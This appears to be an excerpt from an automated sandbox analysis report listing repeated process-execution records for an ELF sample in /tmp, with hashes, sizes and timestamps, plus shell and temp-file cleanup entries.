                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:20:55
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:21:10
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:21:26
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:21:41
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:21:56
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:22:11
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:22:26
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:22:41
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:22:57
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:23:12
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:23:27
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:23:42
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:23:57
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:24:12
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b

                                        Start time (UTC):07:20:06
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b
                                        Start time (UTC):07:20:06
                                        Start date (UTC):31/03/2024
                                        Path:/tmp/QvyiI8SFTm.elf
                                        Arguments:-
                                        File size:123660 bytes
                                        MD5 hash:674d0a7fdcd07d7496e25f39b4bad83b
                                        Start time (UTC):07:21:19
                                        Start date (UTC):31/03/2024
                                        Path:/usr/bin/dash
                                        Arguments:-
                                        File size:129816 bytes
                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                        Start time (UTC):07:21:19
                                        Start date (UTC):31/03/2024
                                        Path:/usr/bin/rm
                                        Arguments:rm -f /tmp/tmp.57BvmQ7cWd /tmp/tmp.4Vuw4Wy8Lc /tmp/tmp.3hJvBf7jEe
                                        File size:72056 bytes
                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                        Start time (UTC):07:21:19
                                        Start date (UTC):31/03/2024
                                        Path:/usr/bin/dash
                                        Arguments:-
                                        File size:129816 bytes
                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                        Start time (UTC):07:21:19
                                        Start date (UTC):31/03/2024
                                        Path:/usr/bin/rm
                                        Arguments:rm -f /tmp/tmp.57BvmQ7cWd /tmp/tmp.4Vuw4Wy8Lc /tmp/tmp.3hJvBf7jEe
                                        File size:72056 bytes
                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b